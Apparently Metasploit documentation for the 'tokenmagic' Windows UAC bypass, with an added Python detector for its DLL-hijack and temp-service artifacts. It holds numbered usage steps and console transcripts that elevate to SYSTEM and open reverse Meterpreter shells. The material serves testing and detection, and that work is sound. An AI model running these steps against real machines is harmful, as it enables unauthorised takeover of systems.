metasploit-gs/documentation/modules/exploit/windows/local/tokenmagic.md
2021-05-14 17:44:07 -05:00

Vulnerable Application

This module exploits a UAC bypass in Windows that lets an attacker with a medium-integrity user session obtain code execution as SYSTEM by leveraging a privileged file write. From the PoC:

Essentially we duplicate the token of an elevated process, lower its mandatory integrity level, use it to create a new restricted token, impersonate it and use the Secondary Logon service to spawn a new process with High IL. Like playing hide-and-go-seek with tokens.

The module then uses the High IL obtained from the "token magic" in one of two ways: it either installs and starts a malicious service, or it performs a DLL hijack against a known DLL in system32.
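
For defenders, the two triggers leave distinct artifacts: in DLL mode, a file create at the hijack target under System32 followed by usoclient loading it; in SERVICE mode, a new service whose binary sits under the user's Temp directory (the transcript under Scenarios shows that binary being deleted right after the service starts, so the service-install event is a better signal than a disk scan). Because the write is made with a High-IL token derived from the user's own session, the account recorded on such an event is the low-privileged user rather than SYSTEM. The detection logic below is an added example and is not part of the Metasploit module or the PoC; it runs over constructed event records whose field names are this example's own, and it assumes the System32 write would be recorded against the notepad.exe the module launches to host its trigger.

```python
"""Detection checks for the two tokenmagic triggers described above.

Added example, not code from the Metasploit module or its PoC. The records are
constructed to resemble fields pulled from Windows logs: Sysmon event 11
(FileCreate), Sysmon event 7 (ImageLoaded) and System-log event 7045 (a service
was installed). Field names are this example's own.
"""
import re

# Hijack target named in the Options section (DLL mode).
HIJACK_DLL = r"c:\windows\system32\windowscoredeviceinfo.dll"

# Process the module uses to load the planted DLL (DLL mode).
TRIGGER_IMAGE = "usoclient.exe"

# A service binary under a per-user Temp directory (the default WRITABLE_DIR)
# is not something a legitimate installer registers.
USER_TEMP = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\local\\temp\\")


def normalize_path(path):
    """Lower-case a path and strip the quotes a 7045 ImagePath often carries."""
    return path.strip().strip('"').lower()


def basename(path):
    """Final path component of a normalized Windows path."""
    return normalize_path(path).rsplit("\\", 1)[-1]


def detect(events):
    """Return one finding per record that matches a tokenmagic trigger artifact."""
    findings = []
    for ev in events:
        eid = ev.get("id")
        if eid == 11 and normalize_path(ev.get("target", "")) == HIJACK_DLL:
            # Somebody created the hijack target; note that the writer is a
            # normal user process, not SYSTEM or TrustedInstaller.
            findings.append({
                "rule": "tokenmagic_dll_hijack_write",
                "path": ev["target"], "writer": ev.get("image"), "user": ev.get("user"),
            })
        elif (eid == 7 and basename(ev.get("image", "")) == TRIGGER_IMAGE
              and normalize_path(ev.get("image_loaded", "")) == HIJACK_DLL):
            # The trigger process loaded the planted DLL.
            findings.append({
                "rule": "tokenmagic_dll_hijack_load",
                "path": ev["image_loaded"], "loader": ev.get("image"), "signed": ev.get("signed"),
            })
        elif eid == 7045 and USER_TEMP.search(normalize_path(ev.get("image_path", ""))):
            # Service registered with its binary in a user-writable Temp dir.
            findings.append({
                "rule": "tokenmagic_temp_service_binary",
                "service": ev.get("service"), "path": ev["image_path"], "account": ev.get("account"),
            })
    return findings


# Constructed sample records. Host and file names are taken from the Scenarios
# transcript; the process performing the System32 write is an assumption.
SAMPLE_EVENTS = [
    {"id": 11, "image": r"C:\Windows\System32\notepad.exe", "user": r"DESKTOP-O5RD7G3\msfuser",
     "target": r"C:\Windows\System32\WindowsCoreDeviceInfo.dll"},
    {"id": 11, "image": r"C:\Windows\System32\svchost.exe", "user": r"NT AUTHORITY\SYSTEM",
     "target": r"C:\Windows\System32\catroot2\edb.log"},
    {"id": 7, "image": r"C:\Windows\System32\UsoClient.exe", "signed": "false",
     "image_loaded": r"C:\Windows\System32\WindowsCoreDeviceInfo.dll"},
    {"id": 7045, "service": "eNlQhw", "account": "LocalSystem",
     "image_path": r'"C:\Users\msfuser\AppData\Local\Temp\kaOOacm.exe"'},
    {"id": 7045, "service": "Sense", "account": "LocalSystem",
     "image_path": r'"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"'},
]

if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed records, the three suspicious events produce one finding each and the two benign ones produce none. In a real pipeline the same three rules apply to the parsed EventData of the corresponding log entries; the Temp-directory rule is the one to keep even after the module's cleanup, since the 7045 record survives the deletion of the service binary.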

Installation And Setup

Windows 10 version 1803 (build 17134) is vulnerable out of the box. Token Magic works on Windows 10 releases up to and including 1803. Mileage may vary for the DLL hijack trigger on earlier Windows 10 versions; the SERVICE method was also tested on 1703 (see Scenarios).

Verification Steps

  1. Start msfconsole
  2. Get at least a user shell
  3. Do: use exploit/windows/local/tokenmagic
  4. Set the METHOD of exploitation, either DLL or SERVICE
  5. Set the LHOST, SESSION and PAYLOAD options
  6. Do: run
  7. You should get a shell; the exploitation process should be fairly instantaneous

Options

METHOD
Select between DLL hijacking (DLL) and service exploitation (SERVICE); SERVICE is the default.
DLL mode: using the elevated privileges from token magic, the module writes a malicious DLL to c:\windows\system32\windowscoredeviceinfo.dll and uses usoclient to trigger it, so the payload runs with SYSTEM level privileges. The DLL run shown under Scenarios prints no cleanup message for this file, so confirm it has been removed after testing.
SERVICE mode: using the elevated privileges from token magic, the module creates a malicious service and then starts it, so the payload runs with SYSTEM level privileges. The service binary is uploaded to WRITABLE_DIR and deleted once the service has started.

SERVICE_FILENAME
Filename for Service Payload (%RAND% by default).

SERVICE_NAME
Service Name to use (%RAND% by default).

SESSION
The session to run this module on.

WRITABLE_DIR
Location of file to overwrite (%TEMP% by default).

Scenarios

Tested on Windows 10 x64 1803 (Build 17134) via DLL Hijacking

msf6 > use multi/handler
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444 
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.135:49785) at 2021-05-11 19:24:16 -0400

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set lport 4443
lport => 4443
msf6 exploit(windows/local/tokenmagic) > set wfsdelday 900
wfsdelday => 900
msf6 exploit(windows/local/tokenmagic) > set method dll
method => dll
msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Payload DLL is 8704 bytes long
[*] Attempting to PrivEsc on DESKTOP-O5RD7G3 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\WindowsCoreDeviceInfo.dll
[*] Running Exploit on DESKTOP-O5RD7G3
[*] Executing 
[*] Starting the interactive scan job...
[*] Trying to start notepad
[*] Launching notepad to host the exploit...
[+] Process 5524 launched.
[*] Reflectively injecting the trigger DLL into 5524...
[*] Trigger injected. Starting thread...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Enjoy the shell!
[*] Sending stage (200262 bytes) to 172.16.199.135
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.135:49792) at 2021-05-11 19:26:07 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-O5RD7G3
OS              : Windows 10 (10.0 Build 17134).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter > 

Tested on Windows 10 x64 1703 (Build 15063) via service exploitation

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.16.199.1:4444 
[*] Sending stage (200262 bytes) to 172.16.199.133
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.133:49994) at 2021-05-07 15:04:19 -0400

meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > use windows/local/tokenmagic
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/tokenmagic) > show options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
   SERVICE_FILENAME  kaOOacm          no        Filename for Service Payload (%RAND% by default).
   SERVICE_NAME      eNlQhw           no        Service Name to use (%RAND% by default).
   SESSION                            yes       The session to run this module on.
   WRITABLE_DIR                       no        Location of file to overwrite (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > set session 1
session => 1
msf6 exploit(windows/local/tokenmagic) > set LHOST 172.16.199.1
LHOST => 172.16.199.1 
msf6 exploit(windows/local/tokenmagic) > set LPORT 4443
LPORT => 4443
msf6 exploit(windows/local/tokenmagic) > show options

Module options (exploit/windows/local/tokenmagic):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   METHOD            SERVICE          yes       SERVICE or DLL, please select which attack method you would like to use (SERVICE by default).
   SERVICE_FILENAME  kaOOacm          no        Filename for Service Payload (%RAND% by default).
   SERVICE_NAME      eNlQhw           no        Service Name to use (%RAND% by default).
   SESSION           1                yes       The session to run this module on.
   WRITABLE_DIR                       no        Location of file to overwrite (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.16.199.1     yes       The listen address (an interface may be specified)
   LPORT     4443             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/local/tokenmagic) > run

[*] Started reverse TCP handler on 172.16.199.1:4443 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on DESKTOP-D6CQCM7 via session ID: 1
[*] Uploading payload to C:\Users\msfuser\AppData\Local\Temp\kaOOacm.exe
[*] Running Exploit on DESKTOP-D6CQCM7
[*] Sending stage (200262 bytes) to 172.16.199.133
[+] Deleted C:\Users\msfuser\AppData\Local\Temp\kaOOacm.exe
[*] Meterpreter session 2 opened (172.16.199.1:4443 -> 172.16.199.133:49995) at 2021-05-07 15:05:28 -0400

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-D6CQCM7
OS              : Windows 10 (10.0 Build 15063).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 3
Meterpreter     : x64/windows
meterpreter >